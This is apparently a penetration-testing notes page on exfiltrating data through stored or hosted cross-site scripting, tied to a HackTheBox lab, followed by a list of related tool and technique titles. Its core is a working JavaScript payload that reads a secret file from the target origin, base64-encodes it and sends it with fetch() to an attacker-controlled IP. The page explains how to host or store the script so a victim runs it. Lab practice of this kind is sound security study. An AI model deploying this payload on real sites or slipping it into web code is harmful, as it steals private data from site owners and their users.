Data Exfiltration

Stored / Hosted XSS

If the target page has a loose content security policy / cross-origin policy, then you may be able to host xss.js using a Python web server and have the target execute the JavaScript to read the page source stored in url.

If there is a vulnerability where you can store this script on the target, then the script would be hosted in a trusted origin and cause the target to execute the JavaScript and read the page source in url.

The data is then base64-encoded and transmitted back to the attacker in the URL query at the /data URL.

See https://benheater.com/hackthebox-alert/ for example.

<script>
  var url = "http://domain.tld/secret.txt";
  var attacker = "http://10.10.14.165/data";
  var xhr  = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
      if (xhr.readyState == XMLHttpRequest.DONE) {
          fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
      }
  }
  xhr.open('GET', url, true);
  xhr.send(null);
</script>

xss.js

Using an Ad-Hoc Nginx Server to Catch-Web Requests

Using an Ad-Hoc Python Web Server to Catch HTTP Client Requests

FFUF

Gobuster

Burp Chromium Browser Always Upgrades to TLS

Constrain Burp Memory Usage

Data Exfiltration

Cookie Theft

Manual Testing with cURL

git-dumper

Mining Data from Git Repos

jq

Finding Build Manifests

Install Ghauri on Kali Linux

Multipart Forms and Boundary Parameters

Manual Enumeration with Nmap

Data Exfiltration

Stored / Hosted XSS